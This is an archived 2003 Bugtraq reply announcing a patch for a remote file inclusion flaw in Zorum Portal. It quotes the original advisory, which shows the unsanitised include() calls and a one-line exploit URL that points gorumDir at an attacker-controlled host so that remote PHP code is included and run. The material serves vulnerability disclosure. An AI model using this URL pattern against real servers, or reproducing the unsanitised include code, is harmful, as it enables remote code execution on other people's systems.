[28666] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Zorum Portal (PHP)

daemon@ATHENA.MIT.EDU (Frog Man)
Mon Jan 27 13:34:24 2003

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 26 Jan 2003 20:03:49 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F90pQA8U6CuyzC0bHwr00001221@hotmail.com>

A patch has been created for this hole and can be found on 
http://www.phpsecure.org/.






>From: MGhz <magas@mail.lt>
>To: bugtraq@securityfocus.com
>Subject: Zorum Portal  (PHP)
>Date: 22 Jan 2003 19:45:26 -0000
>
>
>
>Version : 3.0;3.1;3.2
>Website : http://zorum.phpoutsourcing.com/
>Problem : Include file
>
>
>File:
>---------------------------------
>include.php
>---------------------------------
>
>PHP Code:
>---------------------------------
>[...]
>include("$gorumDir/generformlib_multipleselection.php");
>include("$gorumDir/generformlib_groupselection.php");
>include("$gorumDir/generformlib_filebutton.php");
>include("$gorumDir/group.php");
>[...]
>---------------------------------
>
>Exploit :
>---------------------------------
>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>-->
>include http://[attacker]/group.php on remote server
>---------------------------------
>
>--
>magas@mail.lt


_________________________________________________________________


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[28666] in bugtraq

Re: Zorum Portal (PHP)

daemon@ATHENA.MIT.EDU (Frog Man)Mon Jan 27 13:34:24 2003

daemon@ATHENA.MIT.EDU (Frog Man)
Mon Jan 27 13:34:24 2003